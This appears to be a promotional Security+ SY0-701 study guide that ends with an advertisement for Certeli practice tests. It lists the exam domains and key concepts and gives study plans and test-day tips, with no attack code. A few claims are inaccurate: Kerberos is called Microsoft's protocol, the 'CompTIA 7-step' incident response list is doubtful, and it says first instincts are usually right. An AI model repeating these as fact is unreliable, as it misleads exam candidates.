CompTIA Security+ is the most popular entry-level cybersecurity certification in the world — and for good reason. It's vendor-neutral, globally recognized, and acts as the baseline credential for security roles ranging from security analyst to network administrator to SOC analyst. With over half a million certified professionals worldwide, it's often the first certification employers look for when hiring entry-level cybersecurity talent.

This guide covers everything you need to prepare for and pass the SY0-701 exam — the latest version of Security+, released in November 2023.

What Is CompTIA Security+?

Security+ (SY0-701) is an entry-level cybersecurity certification that validates the core skills required for a career in information security. Unlike vendor-specific certs (like Microsoft SC-900 or AWS Security Specialty), Security+ is vendor-neutral — it tests your understanding of fundamental security concepts that apply across any organization's tech stack.

The exam covers five domains, consists of a mix of multiple-choice and Performance-Based Questions (PBQs), and lasts 90 minutes. In 2026, SY0-701 is the current exam version — CompTIA typically refreshes Security+ every three years, so the next iteration (SY0-801) is likely a year or two away.

Who Should Take Security+?

Career changers moving into cybersecurity from adjacent IT roles
IT professionals who need a security baseline (help desk, network admins, sysadmins)
Students and recent graduates pursuing cybersecurity as their first role
Military and government personnel who need DoD 8570 compliance (Security+ is an approved credential)

Security+ is also a prerequisite or recommended cert for more advanced security certifications like CySA+, CASP+, and CISSP.

The 5 Exam Domains (With Weightages)

The SY0-701 exam is divided into five domains with specific weightages. Allocating your study time proportionally to these percentages is one of the smartest moves you can make.

1. General Security Concepts (12%)

The smallest domain by weight, but it lays the foundation for everything else. Focus on:

The CIA triad — Confidentiality, Integrity, and Availability. Know the definition of each, real-world examples, and which controls map to which pillar. This is the single most important concept in the entire exam.
Non-repudiation — how digital signatures and audit logs prevent someone from denying their actions
Authentication methods — something you know (password), something you have (smart card, token), something you are (biometrics), and somewhere you are (geolocation)
Zero Trust — the "never trust, always verify" model. Understand the three pillars: identity, device, network/environment
Defense in depth — layered security controls (physical, technical, administrative)

Key concepts: CIA triad, AAA (Authentication, Authorization, Accounting), non-repudiation, Zero Trust, least privilege, separation of duties

2. Threats, Vulnerabilities, and Mitigations (22%)

This is the second-largest domain and covers the threat landscape. Expect deep questions on:

Types of malware — viruses, worms, Trojans, ransomware, spyware, rootkits, fileless malware
Social engineering attacks — phishing (spear, whaling, vishing, smishing), pretexting, baiting, tailgating, impersonation
Application attacks — SQL injection, cross-site scripting (XSS), cross-site request forgery (CSRF), buffer overflows, directory traversal
Network attacks — man-in-the-middle (MITM), denial of service (DoS/DDoS), DNS poisoning, ARP spoofing, session hijacking
Physical attacks — brute force (door access), RFID cloning, environmental attacks
Vulnerability scanning and penetration testing — know the difference and when each is used

Common trap: The exam loves presenting a scenario with multiple attack types happening simultaneously. Be able to identify each attack type individually even when they're combined in a question.

3. Security Architecture (18%)

This domain focuses on designing and implementing secure infrastructure:

Network architecture — segmentation (DMZ, VLANs), SDN, zero trust network access (ZTNA), VPNs, secure protocols (HTTPS, SSH, SFTP, IPSec)
Cloud security — shared responsibility model, IaaS vs. PaaS vs. SaaS, cloud deployment models (public, private, hybrid), CASB, cloud security posture management (CSPM)
Identity and access management (IAM) — SSO, SAML, OAuth, OpenID Connect, MFA, federated identity, directory services (Active Directory, LDAP)
Cryptography — symmetric vs. asymmetric encryption (AES vs. RSA), hashing (SHA, MD5 — and why MD5 is broken), digital signatures, PKI, certificates, key management
Resiliency and high availability — redundancy, fault tolerance, replication, backup types (full, incremental, differential)

Key services and technologies: Firewalls (stateful vs. stateless), IDS/IPS, WAF, HSM, TPM, secure enclaves

4. Security Operations (28%)

The largest domain — make sure you spend the most study time here. It covers the day-to-day work of a security professional:

Incident response process — this will be tested heavily. Memorize the NIST 4-phase model: Preparation → Detection & Analysis → Containment, Eradication & Recovery → Post-Incident Activity. (The CompTIA 7-step model is slightly different: Preparation → Identification → Containment → Eradication → Recovery → Lessons Learned → Reporting.)
Forensics — order of volatility (CPU cache > memory > swap > disk > remote archives), chain of custody, preservation of evidence
Security monitoring — SIEM (Security Information and Event Management), log aggregation, Syslog, SNMP, SOAR
Automation — playbooks, SOAR workflows, orchestration
Vulnerability management — scanning frequency, patch management, CVSS scoring
Data security — data classification (PII, PHI, PCI DSS), data at rest vs. in transit vs. in use, DLP policies, tokenization, masking
Business continuity and disaster recovery — RTO, RPO, MTBF, MTTR, backup strategies, hot/cold/warm sites

Common trap: The exam frequently mixes up the order of the incident response phases. You'll see questions like "Which phase comes after Containment?" Make sure you know the sequence cold.

5. Security Program Management and Oversight (20%)

The second-largest domain covers governance, risk, and compliance:

Security policies — acceptable use policy (AUP), data retention, change management, personnel policies (background checks, NDAs, mandatory vacations)
Risk management — risk assessment (qualitative vs. quantitative), risk register, risk treatment options (avoid, transfer, mitigate, accept)
Compliance frameworks — NIST, ISO 27001, PCI DSS, HIPAA, GDPR, FedRAMP, SOC 2
Third-party risk — vendor assessments, SLAs, MOU, BPA
Training and awareness — security awareness programs, phishing simulations

Key concepts: SLE (Single Loss Expectancy), ARO (Annualized Rate of Occurrence), ALE (Annualized Loss Expectancy), risk appetite vs. risk tolerance

Study Approach

Your timeline depends on your background. Here are two realistic paths:

For Beginners (6-10 Weeks)

If you're new to IT security or have less than a year of experience:

Weeks 1-2: Learn the core concepts — CIA triad, authentication methods, encryption basics, types of malware. Watch Professor Messer's SY0-701 video series (free on YouTube) alongside the official CompTIA study guide.
Weeks 3-4: Cover Security Architecture and Security Operations — the heaviest content areas. Set up a home lab with VirtualBox or VMware: create VMs, configure firewalls, observe network traffic with Wireshark.
Weeks 5-6: Dive into Threats & Vulnerabilities and Security Program Management. Take detailed notes on attack types, risk formulas, and compliance frameworks.
Weeks 7-8: Start taking practice exams. Identify your weak domains and go back to study guides and videos for those areas.
Weeks 9-10: Full review — take timed practice exams, review PBQ strategies, drill the concepts you keep getting wrong.

For Experienced IT Pros (3-4 Weeks)

If you have 1-3 years of IT or networking experience:

Week 1: Review all five domains using a cram guide or video series. Focus on the topics you don't encounter daily (crypto, PKI, compliance frameworks).
Week 2: Practice exams, practice exams, practice exams. Take one full exam, review every wrong answer, and re-study those concepts.
Week 3: PBQ practice, memorization drills (encryption algorithms, incident response phases, port numbers), and another full-length mock exam.
Week 4: Final review — weakest domains only, one more full practice test, and test day prep.

Pro tip: The number one mistake candidates make is memorizing facts without understanding scenarios. Security+ questions are heavily scenario-based — knowing why something works is more important than knowing what it is.

PBQ (Performance-Based Question) Strategy

PBQs are hands-on simulations where you drag and drop, configure systems, or order steps. They typically count for 15-30% of your total score and are where most test-takers lose points.

PBQ types you'll see:

Drag-and-drop — match security controls to scenarios, order incident response phases
Network configuration — place firewalls, IDS/IPS, and VPN concentrators on a network diagram
Log analysis — read a log entry and identify the attack type
Policy placement — match security policies to organizational requirements

How to approach PBQs:

Flag and skip the PBQs first. CompTIA allows you to mark questions and return to them. Many candidates start with the multiple-choice section and come back to PBQs once they've warmed up.
Read PBQ instructions very carefully. Each step or detail matters — a single misplacement can cost you the entire question.
Eliminate obviously wrong options first in drag-and-drop questions.
Practice PBQ-style questions before exam day. Use resources like Certeli's practice tests, which include scenario-based PBQ simulations.

Common Exam Traps

These are the mistakes that trip up even well-prepared candidates:

Confusing Authentication Protocols

The exam loves mixing up SAML, OAuth, OpenID Connect, and Kerberos. Here's a quick cheat sheet:

SAML — XML-based, used for enterprise SSO (federated identity between organizations)
OAuth 2.0 — authorization framework (delegated access, tokens), used for "Login with Google/Facebook"
OpenID Connect (OIDC) — authentication layer built on top of OAuth 2.0, adds identity tokens (ID tokens in JWT format)
Kerberos — Microsoft's network authentication protocol, uses tickets and a Key Distribution Center (KDC)
RADIUS — centralized AAA for network devices (wireless, VPN)
TACACS+ — Cisco's proprietary AAA protocol (encrypts the entire packet, not just the password)

Wrong Order in Incident Response

This is the #1 memorization trap. Two models exist and both are fair game:

NIST Model (4 phases):

Preparation → 2. Detection & Analysis → 3. Containment, Eradication & Recovery → 4. Post-Incident Activity

CompTIA Model (7 steps):

Preparation → 2. Identification → 3. Containment → 4. Eradication → 5. Recovery → 6. Lessons Learned → 7. Reporting

Memory aid: "Please Identify Cats Eating Raw Lasagna Repeatedly"

Encryption Algorithm Confusion

Another frequent confusion point. Memorize these:

Symmetric (shared key, faster): AES (the standard), DES (retired), 3DES (retired), Blowfish, Twofish, ChaCha20
Asymmetric (public/private key, slower): RSA, ECC, Diffie-Hellman (key exchange only), DSA, ECDSA
Hashing (one-way, no key): SHA-256, SHA-3, MD5 (broken — don't use!), HMAC (keyed hash)

Exam tip: When a question asks about "confidentiality," think encryption (AES, RSA). When it asks about "integrity" or "non-repudiation," think hashing or digital signatures.

Port Number Gotchas

Memorize these common ones:

Service	Port	Protocol
SSH	22	TCP
HTTPS	443	TCP
DNS	53	UDP/TCP
SMB	445	TCP
RDP	3389	TCP
LDAP	389	TCP
LDAPS	636	TCP
IMAP	143	TCP
SNMP	161	UDP
SQL Server	1433	TCP
MySQL	3306	TCP

The exam won't give you these — you just need to know them.

Why Practice Exams Matter (A Lot)

You cannot pass Security+ without taking practice exams — full stop. Here's why:

They train your brain for CompTIA's question style. Security+ questions are wordy and scenario-driven. Practice exams teach you to extract the key details quickly.
They reveal your weak domains. If you're scoring 80% on Security Operations but 50% on Security Architecture, you know exactly where to focus.
They build exam stamina. The real exam is 90 minutes. Taking timed practice tests simulates the pressure and teaches you pacing.
They expose trap patterns. CompTIA uses specific trick question patterns — you'll recognize them on exam day if you've seen them in practice tests.

How to Use Practice Exams Effectively

Don't take a practice test until you've completed your first pass of the material. Taking one cold is a waste — you'll just get discouraged.
After each practice test, review EVERY question you got wrong. Understand why the correct answer is correct and why the wrong answers are wrong.
Track your domain scores. If you consistently struggle with one domain, go back to the study materials.
Aim for 85%+ on practice exams before booking the real thing. This gives you a comfortable margin above the passing score (750/900).
Take at least 3-5 full-length practice exams before exam day.

Recommended Study Resources

Free Resources

Professor Messer's SY0-701 Course — The gold standard. Free video series covering every exam objective. Watch at 1.25x speed if you're on a tight schedule.
CompTIA SY0-701 Exam Objectives PDF — CompTIA publishes the full exam objectives. Print them and check off topics as you master them.
CompTIA Security+ Acronyms List — Download and memorize. The exam uses acronyms without spelling them out.
YouTube walkthroughs — Search for "SY0-701 PBQ walkthrough" for hands-on simulation practice.

Paid Resources

CompTIA Official Study Guide (Sybex) — The "bible" of Security+ study materials. Comprehensive but dense.
CompTIA CertMaster Practice — CompTIA's official practice question bank. Good but expensive.
Jason Dion's Practice Exams (Udemy) — Widely regarded as the most realistic practice tests outside of the real exam.
Certeli CompTIA Security+ Practice Tests — Realistic SY0-701 practice questions with detailed explanations and performance tracking.

Hands-On Practice

Security+ is less hands-on than certs like AZ-104, but you still benefit from lab work:

TryHackMe (SOC Fundamentals path) — Free tier covers SIEM, log analysis, and incident response
Wireshark — Capture and analyze network traffic to understand packet-level attacks
VirtualBox + Kali Linux — Set up vulnerable VMs and practice identifying exploits
Security onion — A free Linux distro for security monitoring and log analysis

Exam Day Tips

Arrive early. You'll need to check in, show ID, and get settled. Pearson VUE centers are strict about timing.
Flag hard questions and move on. You have 90 minutes for up to 90 questions. Don't get stuck — flag and return.
Read the ENTIRE question before looking at answers. CompTIA often buries critical details in the last sentence of a scenario.
Eliminate two wrong answers first. Most questions have two clearly wrong options. Work from there.
PBQ strategy: Skip PBQs initially, answer all multiple-choice questions, then come back to PBQs with remaining time.
Bring your CompTIA exam voucher and two forms of ID. Government-issued photo ID + credit card or passport is standard.
Don't change answers unless you're sure. Studies show your first instinct is usually correct. Only change if you find a clear error in your reasoning.

Start Your Security+ Journey Today

CompTIA Security+ is your gateway to a career in cybersecurity. It's challenging, but with the right study plan, consistent practice, and high-quality practice questions, you can pass on your first attempt.

Ready to test your knowledge? Try CompTIA Security+ practice questions on Certeli — realistic SY0-701 scenarios, detailed explanations, and performance tracking to identify your weak spots before exam day. Whether you're looking for CompTIA Security+ practice tests, SY0-701 exam prep resources, or a complete Security+ study guide, Certeli has everything you need to succeed.